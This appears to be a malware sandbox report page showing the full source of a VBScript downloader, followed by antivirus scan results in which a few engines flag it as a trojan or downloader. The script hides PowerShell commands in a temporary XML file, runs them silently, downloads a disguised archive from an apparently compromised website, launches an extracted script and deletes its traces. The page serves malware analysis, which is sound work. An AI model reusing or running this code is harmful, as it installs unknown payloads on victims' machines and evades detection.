Static | ZeroBOX
No static analysis available.
Set alllosh = WScript.CreateObject("WScript.Shell")
strXML = "<command>" & _
" <a>" & _
" <execute>Start-BitsTransfer -Source ""http://borgomaira.it/wp-admin/images/hb.jpg"" -Destination ""C:\Users\Public\ben.zip""; Expand-Archive -Path ""C:\Users\Public\ben.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\Error.vbs""; Remove-Item -Path ""C:\Users\Public\ben.zip"" -Force</execute>" & _
" </a>" & _
"</command>"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\Users\Public\temp.xml", True)
objFile.Write strXML
objFile.Close
alllosh.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\temp.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command""", 0, True
objFSO.DeleteFile "C:\Users\Public\temp.xml"
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Symantec ISB.Downloader!gen48
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Agent.gen
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
TACHYON Clean
Emsisoft Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Sophos Clean
Jiangmin Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm HEUR:Trojan.Script.Agent.gen
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
MAX Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.